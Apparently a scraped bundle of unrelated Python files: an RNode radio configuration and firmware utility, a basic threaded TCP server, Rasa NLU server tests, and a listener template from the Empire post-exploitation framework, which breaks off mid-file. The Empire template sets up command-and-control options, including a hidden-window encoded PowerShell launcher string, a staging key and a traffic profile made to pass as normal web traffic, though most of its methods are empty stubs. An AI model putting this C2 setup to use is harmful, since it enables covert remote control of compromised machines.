KISS.DETECT_RESP: self.detected = True else: self.detected = False else: time_since_last = int(time.time()*1000) - last_read_ms if len(data_buffer) > 0 and time_since_last > self.timeout: RNS.log(str(self)+" serial read timeout") data_buffer = b"" in_frame = False command = KISS.CMD_UNKNOWN escape = False sleep(0.08) except Exception as e: raise e exit() def updateBitrate(self): try: self.bitrate = self.r_sf * ( (4.0/self.r_cr) / (math.pow(2,self.r_sf)/(self.r_bandwidth/1000)) ) * 1000 self.bitrate_kbps = round(self.bitrate/1000.0, 2) except Exception as e: self.bitrate = 0 def updateVersion(self): minstr = str(self.minor_version) if len(minstr) == 1: minstr = "0"+minstr self.version = str(self.major_version)+"."+minstr def detect(self): kiss_command = bytes([KISS.FEND, KISS.CMD_DETECT, KISS.DETECT_REQ, KISS.FEND, KISS.CMD_FW_VERSION, 0x00, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring spreading factor for "+self(str)) def initRadio(self): self.setFrequency() self.setBandwidth() self.setTXPower() self.setSpreadingFactor() self.setCodingRate() self.setRadioState(KISS.RADIO_STATE_ON) def setFrequency(self): c1 = self.frequency >> 24 c2 = self.frequency >> 16 & 0xFF c3 = self.frequency >> 8 & 0xFF c4 = self.frequency & 0xFF data = KISS.escape(bytes([c1])+bytes([c2])+bytes([c3])+bytes([c4])) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_FREQUENCY])+data+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring frequency for "+self(str)) def setBandwidth(self): c1 = self.bandwidth >> 24 c2 = self.bandwidth >> 16 & 0xFF c3 = self.bandwidth >> 8 & 0xFF c4 = self.bandwidth & 0xFF data = KISS.escape(bytes([c1])+bytes([c2])+bytes([c3])+bytes([c4])) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_BANDWIDTH])+data+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring bandwidth for "+self(str)) def setTXPower(self): txp = bytes([self.txpower]) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_TXPOWER])+txp+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring TX power for "+self(str)) def setSpreadingFactor(self): sf = bytes([self.sf]) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_SF])+sf+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring spreading factor for "+self(str)) def setCodingRate(self): cr = bytes([self.cr]) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_CR])+cr+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring coding rate for "+self(str)) def setRadioState(self, state): kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_RADIO_STATE])+bytes([state])+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring radio state for "+self(str)) def setNormalMode(self): kiss_command = bytes([KISS.FEND, KISS.CMD_CONF_DELETE, 0x00, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring device mode") def setTNCMode(self): kiss_command = bytes([KISS.FEND, KISS.CMD_CONF_SAVE, 0x00, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring device mode") def wipe_eeprom(self): kiss_command = bytes([KISS.FEND, KISS.CMD_ROM_WIPE, 0xf8, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while wiping EEPROM") sleep(13); def write_eeprom(self, addr, byte): write_payload = b"" + bytes([addr, byte]) write_payload = KISS.escape(write_payload) kiss_command = bytes([KISS.FEND, KISS.CMD_ROM_WRITE]) + write_payload + bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while writing EEPROM") def download_eeprom(self): kiss_command = bytes([KISS.FEND, KISS.CMD_ROM_READ, 0x00, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring radio state") sleep(0.2) if self.eeprom == None: RNS.log("Could not download EEPROM from device. Is a valid firmware installed?") exit() else: self.parse_eeprom() def parse_eeprom(self): if self.eeprom[ROM.ADDR_INFO_LOCK] == ROM.INFO_LOCK_BYTE: from cryptography.hazmat.primitives import hashes from cryptography.hazmat.backends import default_backend self.provisioned = True self.product = self.eeprom[ROM.ADDR_PRODUCT] self.model = self.eeprom[ROM.ADDR_MODEL] self.hw_rev = self.eeprom[ROM.ADDR_HW_REV] self.serialno = bytes([self.eeprom[ROM.ADDR_SERIAL], self.eeprom[ROM.ADDR_SERIAL+1], self.eeprom[ROM.ADDR_SERIAL+2], self.eeprom[ROM.ADDR_SERIAL+3]]) self.made = bytes([self.eeprom[ROM.ADDR_MADE], self.eeprom[ROM.ADDR_MADE+1], self.eeprom[ROM.ADDR_MADE+2], self.eeprom[ROM.ADDR_MADE+3]]) self.checksum = b"" self.min_freq = ranges[self.model][0] self.max_freq = ranges[self.model][1] self.max_output = ranges[self.model][2] try: self.min_freq = ranges[self.model][0] self.max_freq = ranges[self.model][1] self.max_output = ranges[self.model][2] except Exception as e: RNS.log("Exception") RNS.log(str(e)) self.min_freq = 0 self.max_freq = 0 self.max_output = 0 for i in range(0,16): self.checksum = self.checksum+bytes([self.eeprom[ROM.ADDR_CHKSUM+i]]) self.signature = b"" for i in range(0,128): self.signature = self.signature+bytes([self.eeprom[ROM.ADDR_SIGNATURE+i]]) checksummed_info = b"" + bytes([self.product]) + bytes([self.model]) + bytes([self.hw_rev]) + self.serialno + self.made digest = hashes.Hash(hashes.MD5(), backend=default_backend()) digest.update(checksummed_info) checksum = digest.finalize() if self.checksum != checksum: self.provisioned = False RNS.log("EEPROM checksum mismatch") exit() else: RNS.log("EEPROM checksum correct") from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.serialization import load_der_public_key from cryptography.hazmat.primitives.serialization import load_der_private_key from cryptography.hazmat.primitives.asymmetric import padding # Try loading local signing key for # validation of self-signed devices if os.path.isdir("./firmware") and os.path.isfile("./firmware/signing.key"): private_bytes = None try: file = open("./firmware/signing.key", "rb") private_bytes = file.read() file.close() except Exception as e: RNS.log("Could not load local signing key") try: private_key = serialization.load_der_private_key( private_bytes, password=None, backend=default_backend() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) public_bytes_hex = RNS.hexrep(public_bytes, delimit=False) vendor_keys = [] for known in known_keys: vendor_keys.append(known[1]) if not public_bytes_hex in vendor_keys: local_key_entry = ["LOCAL", public_bytes_hex] known_keys.append(local_key_entry) except Exception as e: RNS.log("Could not deserialize local signing key") RNS.log(str(e)) for known in known_keys: vendor = known[0] public_hexrep = known[1] public_bytes = bytes.fromhex(public_hexrep) public_key = load_der_public_key(public_bytes, backend=default_backend()) try: public_key.verify( self.signature, self.checksum, padding.PSS( mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH ), hashes.SHA256()) if vendor == "LOCAL": self.locally_signed = True self.signature_valid = True self.vendor = vendor except Exception as e: pass if self.signature_valid: RNS.log("Device signature validated") else: RNS.log("Device signature validation failed") if self.eeprom[ROM.ADDR_CONF_OK] == ROM.CONF_OK_BYTE: self.configured = True self.conf_sf = self.eeprom[ROM.ADDR_CONF_SF] self.conf_cr = self.eeprom[ROM.ADDR_CONF_CR] self.conf_txpower = self.eeprom[ROM.ADDR_CONF_TXP] self.conf_frequency = self.eeprom[ROM.ADDR_CONF_FREQ] << 24 | self.eeprom[ROM.ADDR_CONF_FREQ+1] << 16 | self.eeprom[ROM.ADDR_CONF_FREQ+2] << 8 | self.eeprom[ROM.ADDR_CONF_FREQ+3] self.conf_bandwidth = self.eeprom[ROM.ADDR_CONF_BW] << 24 | self.eeprom[ROM.ADDR_CONF_BW+1] << 16 | self.eeprom[ROM.ADDR_CONF_BW+2] << 8 | self.eeprom[ROM.ADDR_CONF_BW+3] else: self.configured = False else: self.provisioned = False def device_probe(self): sleep(2.5) self.detect() sleep(0.1) if self.detected == True: RNS.log("Device connected") RNS.log("Firmware version: "+self.version) return True else: raise IOError("Got invalid response while detecting device") def main(): try: if not util.find_spec("serial"): raise ImportError("Serial module could not be found") except ImportError: print("") print("RNode Config Utility needs pyserial to work.") print("You can install it with: pip3 install pyserial") print("") exit() try: if not util.find_spec("cryptography"): raise ImportError("Cryptography module could not be found") except ImportError: print("") print("RNode Config Utility needs the cryptography module to work.") print("You can install it with: pip3 install cryptography") print("") exit() import serial try: parser = argparse.ArgumentParser(description="RNode Configuration and firmware utility. This program allows you to change various settings and startup modes of RNode. It can also flash and update the firmware, and manage device EEPROM.") parser.add_argument("-i", "--info", action="store_true", help="Show device info") parser.add_argument("-T", "--tnc", action="store_true", help="Switch device to TNC mode") parser.add_argument("-N", "--normal", action="store_true", help="Switch device to normal mode") parser.add_argument("-b", "--backup", action="store_true", help="Backup EEPROM to file") parser.add_argument("-d", "--dump", action="store_true", help="Dump EEPROM to console") parser.add_argument("-f", "--flash", action="store_true", help="Flash firmware and bootstrap EEPROM") parser.add_argument("-r", "--rom", action="store_true", help="Bootstrap EEPROM without flashing firmware") parser.add_argument("-u", "--update", action="store_true", help="Update firmware") parser.add_argument("-k", "--key", action="store_true", help="Generate a new signing key and exit") parser.add_argument("-p", "--public", action="store_true", help="Display public part of signing key") parser.add_argument("--freq", action="store", metavar="Hz", type=int, default=None, help="Frequency in Hz for TNC mode") parser.add_argument("--bw", action="store", metavar="Hz", type=int, default=None, help="Bandwidth in Hz for TNC mode") parser.add_argument("--txp", action="store", metavar="dBm", type=int, default=None, help="TX power in dBm for TNC mode") parser.add_argument("--sf", action="store", metavar="factor", type=int, default=None, help="Spreading factor for TNC mode (7 - 12)") parser.add_argument("--cr", action="store", metavar="rate", type=int, default=None, help="Coding rate for TNC mode (5 - 8)") parser.add_argument("--model", action="store", metavar="model", type=str, default=None, help="Model code for EEPROM bootstrap") parser.add_argument("--hwrev", action="store", metavar="revision", type=int, default=None, help="Hardware revision EEPROM bootstrap") parser.add_argument("--nocheck", action="store_true", help="Don't check for firmware updates online") parser.add_argument("--eepromwipe", action="store_true", help="Unlock and wipe EEPROM") parser.add_argument("--version", action="store_true", help="Print version and exit") parser.add_argument("port", nargs="?", default=None, help="serial port where RNode is attached", type=str) args = parser.parse_args() if args.version: print("rnodeconf "+program_version) exit(0) if args.public or args.key or args.flash or args.rom: from cryptography.hazmat.primitives import hashes from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.serialization import load_der_public_key from cryptography.hazmat.primitives.serialization import load_der_private_key from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.hazmat.primitives.asymmetric import padding if args.public: private_bytes = None try: file = open("./firmware/signing.key", "rb") private_bytes = file.read() file.close() except Exception as e: RNS.log("Could not load signing key") try: private_key = serialization.load_der_private_key( private_bytes, password=None, backend=default_backend() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) RNS.log("Public key:") RNS.log(RNS.hexrep(public_bytes, delimit=False)) except Exception as e: RNS.log("Could not deserialize signing key") RNS.log(str(e)) exit() if args.key: RNS.log("Generating a new signing key...") private_key = rsa.generate_private_key( public_exponent=65337, key_size=1024, backend=default_backend() ) private_bytes = private_key.private_bytes( encoding=serialization.Encoding.DER, format=serialization.PrivateFormat.PKCS8, encryption_algorithm=serialization.NoEncryption() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) os.makedirs("./firmware", exist_ok=True) if os.path.isdir("./firmware"): if os.path.isfile("./firmware/signing.key"): RNS.log("Signing key already exists, not overwriting!") RNS.log("Manually delete this key to create a new one.") else: file = open("./firmware/signing.key", "wb") file.write(private_bytes) file.close() RNS.log("Wrote signing key") RNS.log("Public key:") RNS.log(RNS.hexrep(public_bytes, delimit=False)) else: RNS.log("The firmware directory does not exist, can't write key!") exit() if args.port: if args.update: if not args.nocheck: try: RNS.log("Downloading latest firmware from GitHub...") os.makedirs("./update", exist_ok=True) urlretrieve(firmware_update_url, "update/rnode_update.hex") RNS.log("Firmware download completed") if os.path.isfile("./update/rnode_update.hex"): try: RNS.log("Updating RNode firmware for device on "+args.port) from subprocess import call flash_status = call(["avrdude", "-P", args.port, "-p", "m1284p", "-c", "arduino", "-b", "115200", "-U", "flash:w:update/rnode_update.hex"]) if flash_status == 0: RNS.log("Firmware updated") args.info = True else: exit() except Exception as e: RNS.log("Error while updating firmware") RNS.log(str(e)) else: RNS.log("Firmware update file not found") exit() except Exception as e: RNS.log("Could not download firmware update") RNS.log("The contained exception was: "+str(e)) exit() if args.flash: if os.path.isfile("./firmware/rnode_firmware.hex"): try: RNS.log("Flashing RNode firmware to device on "+args.port) from subprocess import call flash_status = call(["avrdude", "-P", args.port, "-p", "m1284p", "-c", "arduino", "-b", "115200", "-U", "flash:w:firmware/rnode_firmware.hex"]) if flash_status == 0: RNS.log("Done flashing") args.rom = True else: exit() except Exception as e: RNS.log("Error while flashing") RNS.log(str(e)) else: RNS.log("Firmware file not found") exit() RNS.log("Opening serial port "+args.port+"...") try: rnode_serial = serial.Serial( port = args.port, baudrate = rnode_baudrate, bytesize = 8, parity = serial.PARITY_NONE, stopbits = 1, xonxoff = False, rtscts = False, timeout = 0, inter_byte_timeout = None, write_timeout = None, dsrdtr = False ) except Exception as e: RNS.log("Could not open the specified serial port. The contained exception was:") RNS.log(str(e)) exit() rnode = RNode(rnode_serial) thread = threading.Thread(target=rnode.readLoop) thread.setDaemon(True) thread.start() try: rnode.device_probe() except Exception as e: RNS.log("Serial port opened, but RNode did not respond. Is a valid firmware installed?") print(e) exit() RNS.log("Reading EEPROM...") rnode.download_eeprom() if args.eepromwipe: RNS.log("WARNING: EEPROM is being wiped! Power down device NOW if you do not want this!") rnode.wipe_eeprom() if args.dump: RNS.log("EEPROM contents:") RNS.log(RNS.hexrep(rnode.eeprom)) exit() if args.backup: try: timestamp = time.time() filename = str(time.strftime("%Y-%m-%d_%H-%M-%S")) path = "./eeprom/"+filename+".eeprom" file = open(path, "wb") file.write(rnode.eeprom) file.close() RNS.log("EEPROM backup written to: "+path) except Exception as e: RNS.log("EEPROM was successfully downloaded from device,") RNS.log("but file could not be written to disk.") exit() if args.info: if rnode.provisioned: timestamp = struct.unpack(">I", rnode.made)[0] timestring = datetime.datetime.fromtimestamp(timestamp).strftime("%Y-%m-%d %H:%M:%S") sigstring = "Unverified" if rnode.signature_valid: if rnode.locally_signed: sigstring = "Validated - Local signature" else: sigstring = "Genuine board, vendor is "+rnode.vendor RNS.log("") RNS.log("Device info:") RNS.log("\tFirmware version:\t"+rnode.version) RNS.log("\tProduct code:\t\t"+bytes([rnode.product]).hex()) RNS.log("\tModel code:\t\t"+bytes([rnode.model]).hex()) RNS.log("\tHardware revision:\t"+bytes([rnode.hw_rev]).hex()) RNS.log("\tSerial number:\t\t"+RNS.hexrep(rnode.serialno)) RNS.log("\tFrequency range:\t"+str(rnode.min_freq/1e6)+" MHz - "+str(rnode.max_freq/1e6)+" MHz") RNS.log("\tMax TX power:\t\t"+str(rnode.max_output)+" dBm") RNS.log("\tManufactured:\t\t"+timestring) if rnode.configured: rnode.bandwidth = rnode.conf_bandwidth rnode.r_bandwidth = rnode.conf_bandwidth rnode.sf = rnode.conf_sf rnode.r_sf = rnode.conf_sf rnode.cr = rnode.conf_cr rnode.r_cr = rnode.conf_cr rnode.updateBitrate() txp_mw = round(pow(10, (rnode.conf_txpower/10)), 3) RNS.log("\tDevice signature:\t"+sigstring) RNS.log(""); RNS.log("\tDevice mode:\t\tTNC") RNS.log("\t Frequency:\t\t"+str((rnode.conf_frequency/1000000.0))+" MHz") RNS.log("\t Bandwidth:\t\t"+str(rnode.conf_bandwidth/1000.0)+" KHz") RNS.log("\t TX power:\t\t"+str(rnode.conf_txpower)+" dBm ("+str(txp_mw)+" mW)") RNS.log("\t Spreading factor:\t"+str(rnode.conf_sf)) RNS.log("\t Coding rate:\t\t"+str(rnode.conf_cr)) RNS.log("\t On-air bitrate:\t"+str(rnode.bitrate_kbps)+" kbps") else: RNS.log("\tDevice mode:\t\tNormal (host-controlled)") RNS.log("\tDevice signature:\t"+sigstring) print("") exit() else: RNS.log("EEPROM is invalid, no further information available") exit() if args.rom: if rnode.provisioned: RNS.log("EEPROM bootstrap was requested, but a valid EEPROM was already present.") RNS.log("No changes are being made.") exit() else: os.makedirs("./firmware", exist_ok=True) counter = None counter_path = "./firmware/serial.counter" try: if os.path.isfile(counter_path): file = open(counter_path, "r") counter_str = file.read() counter = int(counter_str) file.close() else: counter = 0 except Exception as e: RNS.log("Could not create device serial number, exiting") RNS.log(str(e)) exit() serialno = counter+1 model = None hwrev = None if args.model == "a4": model = ROM.MODEL_A4 if args.model == "a9": model = ROM.MODEL_A9 if args.hwrev != None and (args.hwrev > 0 and args.hwrev < 256): hwrev = chr(args.hwrev) if serialno > 0 and model != None and hwrev != None: try: from cryptography.hazmat.primitives import hashes from cryptography.hazmat.backends import default_backend timestamp = int(time.time()) time_bytes = struct.pack(">I", timestamp) serial_bytes = struct.pack(">I", serialno) file = open(counter_path, "w") file.write(str(serialno)) file.close() info_chunk = b"" + bytes([ROM.PRODUCT_RNODE, model, ord(hwrev)]) info_chunk += serial_bytes info_chunk += time_bytes digest = hashes.Hash(hashes.MD5(), backend=default_backend()) digest.update(info_chunk) checksum = digest.finalize() RNS.log("Loading signing key...") signature = None key_path = "./firmware/signing.key" if os.path.isfile(key_path): try: file = open(key_path, "rb") private_bytes = file.read() file.close() private_key = serialization.load_der_private_key( private_bytes, password=None, backend=default_backend() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) signature = private_key.sign( checksum, padding.PSS( mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH ), hashes.SHA256() ) except Exception as e: RNS.log("Error while signing EEPROM") RNS.log(str(e)) else: RNS.log("No signing key found") exit() RNS.log("Bootstrapping device EEPROM...") rnode.write_eeprom(ROM.ADDR_PRODUCT, ROM.PRODUCT_RNODE) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MODEL, model) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_HW_REV, ord(hwrev)) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL, serial_bytes[0]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL+1, serial_bytes[1]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL+2, serial_bytes[2]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL+3, serial_bytes[3]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE, time_bytes[0]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE+1, time_bytes[1]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE+2, time_bytes[2]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE+3, time_bytes[3]) time.sleep(0.006) for i in range(0,16): rnode.write_eeprom(ROM.ADDR_CHKSUM+i, checksum[i]) time.sleep(0.006) for i in range(0,128): rnode.write_eeprom(ROM.ADDR_SIGNATURE+i, signature[i]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_INFO_LOCK, ROM.INFO_LOCK_BYTE) RNS.log("EEPROM written! Validating...") rnode.download_eeprom() if rnode.provisioned: RNS.log("EEPROM Bootstrapping successful!") try: os.makedirs("./firmware/device_db/", exist_ok=True) file = open("./firmware/device_db/"+serial_bytes.hex(), "wb") written = file.write(rnode.eeprom) file.close() except Exception as e: RNS.log("WARNING: Could not backup device EEPROM to disk") exit() else: RNS.log("EEPROM was written, but validation failed. Check your settings.") exit() except Exception as e: RNS.log("An error occurred while writing EEPROM. The contained exception was:") RNS.log(str(e)) raise e else: RNS.log("Invalid data specified, cancelling EEPROM write") exit() if rnode.provisioned: if args.normal: rnode.setNormalMode() RNS.log("Device set to normal (host-controlled) operating mode") exit() if args.tnc: if not (args.freq and args.bw and args.txp and args.sf and args.cr): RNS.log("Please input startup configuration:") print("") if args.freq: rnode.frequency = args.freq else: print("Frequency in Hz:\t", end="") rnode.frequency = int(input()) if args.bw: rnode.bandwidth = args.bw else: print("Bandwidth in Hz:\t", end="") rnode.bandwidth = int(input()) if args.txp != None and (args.txp >= 0 and args.txp <= 17): rnode.txpower = args.txp else: print("TX Power in dBm:\t", end="") rnode.txpower = int(input()) if args.sf: rnode.sf = args.sf else: print("Spreading factor:\t", end="") rnode.sf = int(input()) if args.cr: rnode.cr = args.cr else: print("Coding rate:\t\t", end="") rnode.cr = int(input()) print("") rnode.initRadio() sleep(0.5) rnode.setTNCMode() RNS.log("Device set to TNC operating mode") sleep(1.0) exit() else: RNS.log("This device contains a valid firmware, but EEPROM is invalid.") RNS.log("Probably the device has not been initialised, or the EEPROM has been erased.") RNS.log("Please correctly initialise the device and try again!") else: print("") parser.print_help() print("") exit() except KeyboardInterrupt: print("") exit() if __name__ == "__main__": main()
tcp_server.py
### # TCP server use multi thread example. # # License - MIT. ### import os import time import socket from threading import Thread # Thread. def thread_function(sock, addr): # { sock.send(b'Connected') while True: data = sock.recv(1024) if not data or 'exit' == data.decode('utf-8'): break sock.send(b'OK') print(data.decode('utf-8')) time.sleep(1) sock.close() print('Client %s:%s exit.' % addr) # } # Main function. def main(): # { # Create socket. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Get host ip address. host_name = socket.gethostname() host_ip = socket.gethostbyname(host_name) # Binding port, default max 65535. # Use host ip or 127.0.0.1 sock.bind((host_ip, 65532)) # Listen port. sock.listen(8) print('TCP Server running...') # Accept. while True: sck, addr = sock.accept() print('Client %s:%s connect.' % addr) # Create sub thread. thrd = Thread(target = thread_function, args = (sck, addr)) thrd.start() # } # Program entry. if '__main__' == __name__: main()
test_server.py
# -*- coding: utf-8 -*- import pytest import requests import os from rasa_nlu.server import RasaNLUServer from rasa_nlu.config import RasaNLUConfig from multiprocessing import Process import time import json import codecs class ResponseTest(): def __init__(self, endpoint, expected_response, payload=None): self.endpoint = endpoint self.expected_response = expected_response self.payload = payload @pytest.fixture def http_server(): def url(port): return "http://localhost:{0}".format(port) # basic conf _config = { 'write': os.path.join(os.getcwd(), "rasa_nlu_logs.json"), 'port': 5022, "backend": "mitie", "path": "./", "data": "./data/demo-restaurants.json", "emulate": "wit" } config = RasaNLUConfig(cmdline_args=_config) # run server in background server = RasaNLUServer(config) p = Process(target=server.start) p.daemon = True p.start() # TODO: implement better way to notify when server is up time.sleep(2) yield url(config.port) p.terminate() def test_root(http_server): req = requests.get(http_server) ret = req.text assert req.status_code == 200 and ret == "hello" def test_status(http_server): req = requests.get(http_server + "/status") ret = req.json() assert req.status_code == 200 and ("training" in ret and "available_models" in ret) def test_get_parse(http_server): tests = [ ResponseTest( u"/parse?q=hello", [{u"entities": {}, u"confidence": 1.0, u"intent": u"greet", u"_text": u"hello"}] ), ResponseTest( u"/parse?q=hello ńöñàśçií", [{u"entities": {}, u"confidence": 1.0, u"intent": u"greet", u"_text": u"hello ńöñàśçií"}] ), ] for test in tests: req = requests.get(http_server + test.endpoint) assert req.status_code == 200 and req.json() == test.expected_response def test_post_parse(http_server): tests = [ ResponseTest( u"/parse", [{u"entities": {}, u"confidence": 1.0, u"intent": u"greet", u"_text": u"hello"}], payload={u"q": u"hello"} ), ResponseTest( u"/parse", [{u"entities": {}, u"confidence": 1.0, u"intent": u"greet", u"_text": u"hello ńöñàśçií"}], payload={u"q": u"hello ńöñàśçií"} ), ] for test in tests: req = requests.post(http_server + test.endpoint, json=test.payload) assert req.status_code == 200 and req.json() == test.expected_response def test_post_train(http_server): train_data = json.loads(codecs.open('data/examples/luis/demo-restaurants.json', encoding='utf-8').read()) req = requests.post(http_server + "/parse", json=train_data) assert req.status_code == 200
template.py
import base64 import random # Empire imports from lib.common import helpers from lib.common import agents from lib.common import encryption from lib.common import packets from lib.common import messages class Listener: def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'Template', 'Author': ['@harmj0y'], 'Description': ("Listener template"), # categories - client_server, peer_to_peer, broadcast, third_party 'Category' : ('client_server'), 'Comments': [] } # any options needed by the stager, settable during runtime self.options = { # format: # value_name : {description, required, default_value} 'Name' : { 'Description' : 'Name for the listener.', 'Required' : True, 'Value' : 'http' }, 'Host' : { 'Description' : 'Hostname/IP for staging.', 'Required' : True, 'Value' : "http://%s:%s" % (helpers.lhost(), 80) }, 'BindIP' : { 'Description' : 'The IP to bind to on the control server.', 'Required' : True, 'Value' : '0.0.0.0' }, 'Port' : { 'Description' : 'Port for the listener.', 'Required' : True, 'Value' : 80 }, 'Launcher' : { 'Description' : 'Launcher string.', 'Required' : True, 'Value' : 'powershell -noP -sta -w 1 -enc ' }, 'StagingKey' : { 'Description' : 'Staging key for initial agent negotiation.', 'Required' : True, 'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa' }, 'DefaultDelay' : { 'Description' : 'Agent delay/reach back interval (in seconds).', 'Required' : True, 'Value' : 5 }, 'DefaultJitter' : { 'Description' : 'Jitter in agent reachback interval (0.0-1.0).', 'Required' : True, 'Value' : 0.0 }, 'DefaultLostLimit' : { 'Description' : 'Number of missed checkins before exiting', 'Required' : True, 'Value' : 60 }, 'DefaultProfile' : { 'Description' : 'Default communication profile for the agent.', 'Required' : True, 'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, 'CertPath' : { 'Description' : 'Certificate path for https listeners.', 'Required' : False, 'Value' : '' }, 'KillDate' : { 'Description' : 'Date for the listener to exit (MM/dd/yyyy).', 'Required' : False, 'Value' : '' }, 'WorkingHours' : { 'Description' : 'Hours for the agent to operate (09:00-17:00).', 'Required' : False, 'Value' : '' }, 'ServerVersion' : { 'Description' : 'Server header for the control server.', 'Required' : True, 'Value' : 'Microsoft-IIS/7.5' }, 'StagerURI' : { 'Description' : 'URI for the stager. Example: stager.php', 'Required' : False, 'Value' : '' }, 'UserAgent' : { 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'Proxy' : { 'Description' : 'Proxy to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'ProxyCreds' : { 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'SlackToken' : { 'Description' : 'Your SlackBot API token to communicate with your Slack instance.', 'Required' : False, 'Value' : '' }, 'SlackChannel' : { 'Description' : 'The Slack channel or DM that notifications will be sent to.', 'Required' : False, 'Value' : '#general' } } # required: self.mainMenu = mainMenu self.threads = {} # used to keep track of any threaded instances of this server # optional/specific for this module # set the default staging key to the controller db default self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0]) def default_response(self): """ If there's a default response expected from the server that the client needs to ignore, (i.e. a default HTTP page), put the generation here. """ print helpers.color("[!] default_response() not implemented for listeners/template") return '' def validate_options(self): """ Validate all options for this listener. """ for key in self.options: if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''): print helpers.color("[!] Option \"%s\" is required." % (key)) return False return True def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None): """ Generate a basic launcher for the specified listener. """ if not language: print helpers.color('[!] listeners/template generate_launcher(): no language specified!') return None if listenerName and (listenerName in self.mainMenu.listeners.activeListeners): # extract the set options for this instantiated listener listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options'] host = listenerOptions['Host']['Value'] stagingKey = listenerOptions['StagingKey']['Value'] profile = listenerOptions['DefaultProfile']['Value'] uris = [a.strip('/') for a in profile.split('|')[0].split(',')] stage0 = random.choice(uris) launchURI = "%s/%s" % (host, stage0) if language.startswith('po'): # PowerShell return '' if language.startswith('py'): # Python return '' else: print helpers.color("[!] listeners/template generate_launcher(): invalid language specification: only 'powershell' and 'python' are current supported for this module.") else: print helpers.color("[!] listeners/template generate_launcher(): invalid listener name specification!") def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None): """ If you want to support staging for the listener module, generate_stager must be implemented to return the stage1 key-negotiation stager code. """ print helpers.color("[!] generate_stager() not implemented for listeners/template") return '' def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""): """ If you want to support staging for the listener module, generate_agent must be implemented to return the actual staged agent code. """ print helpers.color("[!] generate_agent() not implemented for listeners/template") return '' def generate_comms(self, listenerOptions, language=None): """ Generate just the agent communication code block needed for communications with this listener. This is so agents can easily be dynamically updated for the new listener. This should be implemented for the module. """ if language: if language.lower() == 'powershell': updateServers = """ $Script:ControlServers = @("%s"); $Script:ServerIndex = 0; """ % (listenerOptions['Host']['Value']) getTask = """ $script:GetTask = { } """ sendMessage = """ $script:SendMessage = { param($Packets) if($Packets) { } } """ return updateServers + getTask + sendMessage + "\n'New agent comms registered!'" elif language.lower() == 'python': # send_message() pass else: print helpers.color("[!] listeners/template generate_comms(): invalid language specification, only 'powershell' and 'python' are current supported for this module.") else: print helpers.color('[!] listeners/template generate_comms(): no language specified!') def start(self, name=''): """ If a server component needs to be started, implement the 